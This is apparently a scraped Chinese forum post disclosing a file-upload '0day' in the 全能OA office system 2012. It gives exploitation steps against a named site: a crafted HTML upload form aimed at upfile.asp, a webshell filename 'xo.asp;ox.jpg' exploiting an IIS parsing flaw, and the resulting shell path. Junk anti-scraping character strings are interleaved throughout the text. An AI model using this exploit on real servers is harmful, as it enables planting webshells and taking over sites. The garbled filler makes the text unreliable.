全能OA办公系统0day OA办公系统漏洞 上传漏洞

admin

全能OA办公系统 上传漏洞
​
; F- E( Y  g) Z# G$ B& b3 U! Z. f- L系统介绍：
! c) B  H/ ~" z9 Z5 }$ B7 w1 F
全能OA办公系统2012是功能非常强大的OA系统，目前功能已完全能满足日常办公需要。
3 P  R3 F' T# g
主要功能：
公司通告
工作计划
( Z  m5 X$ t# T, N' X通讯助理
+ B* d% \% ^# W4 |: @1 K% G客户资源
/ Z1 Q7 |; B0 _我的公文
公文传阅
0 F, T/ z4 m! Q) O- R8 ~公共资源
: w* @6 e+ W+ Q) Z7 L资源预约
1 {; J4 d6 y7 l$ ~5 [' y" y0 g) i& x今日考勤
个人计划
9 k% _7 m& J- Y6 l个人通讯录
个人基本档案
) K% T7 C0 T5 ?) `5 U/ l未读邮件
) x0 C  S5 @0 t0 W* y+ m发邮件
7 g& m0 x* I  i5 r- R. @' g+ H收件夹
) X- a* ?. Q1 f1 }, T8 i2 C寄件夹
: m0 n5 t( f. b  m3 y% y: V网络硬盘
网络会议
+ [& p1 C& }2 a. R网络调查
* A/ @9 V' m2 p: V7 |/ A交流论坛

* N+ V% J  s# D6 G5 o( e有兴趣测试的朋友可以下源码看看
# j4 Q) w- l' |+ J+ @8 A
; V- [! g7 J; \0 h源码下载：
+ z- Z  Q. @, f  e) G  j
http://www.mycodes.net/30/4750.htm

" x) A# a% g* W漏洞介绍：

9 Y" s7 d; J" c( N$ H由upfile.asp上传文件漏洞引起
' {! O$ m3 v+ S, r6 }
) X( l4 O3 r& O0 D/ E  B测试方法：
. H. S# z/ H, Z2 ^2 `, |& r% I  t
/ v# {3 d: u" @4 E) n  d使用名小子上传http://www.itlynn.com/upfile.asp即可

如果upfile.asp文件被删除不存在。
2 b2 j  @; o6 @' ~
  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。

0 H. e9 y$ `. k. ]如果存在那么将如下代码保存为upfile.html。

- z' l' r5 u; e4 ~; V9 f然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
; v" b8 |/ Z% B9 `


01 <table border='0' align="center" cellpadding="5">

4 r8 w5 \' i. p  H/ e02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">

9 @: i3 Z! ?% i03 <tr>

% i4 g, w" @9 p6 |3 v/ b04             <td>报错：</td>
  W) T. x( M3 J  L( p: U
2 [; Q; Y; }$ {( L05             <td><input type='radio' name='errnumber' value='0'>
4 B" o% y9 Z, l6 l- N
06               自动更名

07               <input type='radio' name='errnumber' value='1' checked>
# M) {0 x# J& z! N$ s6 `
08               报错方式
; R3 U2 ^; y! ?& N! K2 D# F, X
09               <input type='radio' name='errnumber' value='2'>
; d4 _5 I4 s0 L! a  J- N, M: Y
+ }( u3 ]3 {8 G" C( M5 G10               直接覆盖</td>
" K& ^& D0 d& C9 X& }
# S7 P9 P2 d+ e11           </tr>
" W" Q$ ~. \3 L5 J+ D2 V0 T0 R
6 I: i+ o* r2 [  I7 e12           <tr>

/ T( i, Z$ c. `5 b13             <td>主题：</td>

1 `3 f7 Z  ]' s9 T14             <td><input type='text' name='filename' size='30'></td>
, A. n9 }, k* ]; D" F( @2 n9 E
7 _, b0 }3 J5 o3 P+ b* C15           </tr>
% }5 n0 b6 f8 L9 Y7 c
16           <tr>

17             <td>文件：</td>
% t& V% G, X! ]6 I
18             <td><input type="file"name="fruit"size="30"></td>

19           </tr>
2 H; }9 I* S; ^9 [2 a2 S0 K- Y  F
20           <tr>
8 |( \/ r' j/ E* h$ M$ j( u
+ R; Z4 @' r+ M$ O: v21             <td valign='top'>简介：</td>

2 L9 R# n$ m& [; `# N+ a22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>

23           </tr>

" B2 H0 @# i5 i24   

. a2 N  Y5 Y( I, ^) l# [* B25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>

! \) s% K! T# N4 e; Z2 b26           </tr>

27         </form>
. A2 x. u' ~7 I% _) `
: Y* {. i8 F* X& l) a3 N, [然后打开上传一个文件名为xo.asp;ox.jpg的文件。

( q& l5 S  ^9 V7 A. \5 C: O
6 _0 [* C( D( i$ U
上传成功后，马的路径是：http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg

* }4 [/ \2 K- w+ ~6 O此漏洞需要配合解析漏洞利用。

/ }) D  G. H# P2 ?: X+ p